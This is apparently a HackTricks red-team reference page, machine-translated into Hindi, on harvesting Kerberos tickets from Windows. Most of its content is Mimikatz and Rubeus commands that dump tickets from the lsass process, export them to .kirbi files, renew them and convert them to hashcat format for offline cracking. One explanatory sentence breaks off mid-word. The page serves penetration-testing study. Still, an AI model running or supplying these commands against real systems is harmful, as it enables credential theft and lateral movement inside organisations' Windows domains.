Harvesting tickets from Windows

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

Windows में टिकट lsass (स्थानीय सुरक्षा प्राधिकरण उपसिद्ध सेवा) प्रक्रिया द्वारा प्रबंधित और संग्रहीत किए जाते हैं, जो सुरक्षा नीत

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

रुबेस

रुबेस एक उपकरण है जो विशेष रूप से केरबेरोस इंटरेक्शन और मानिपुलेशन के लिए तैयार किया गया है। इसका उपयोग टिकट निकालने और हैंडलिंग, साथ ही अन्य केरबेरोस संबंधित गतिविधियों के लिए किया जाता है।

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

जब इन कमांड्स का उपयोग करें, तो कृपया <BASE64_TICKET> और <luid> जैसे प्लेसहोल्डर को वास्तविक बेस64 एन्कोडेड टिकट और लॉगऑन आईडी के साथ बदल दें। ये उपकरण टिकट को प्रबंधित करने और Windows की सुरक्षा तंत्रों के साथ बातचीत करने के लिए व्यापक कार्यक्षमता प्रदान करते हैं।

संदर्भ

htARTE (HackTricks AWS Red Team Expert) के साथ जीरो से हीरो तक AWS हैकिंग सीखें

HackTricks का समर्थन करने के अन्य तरीके:

Last updated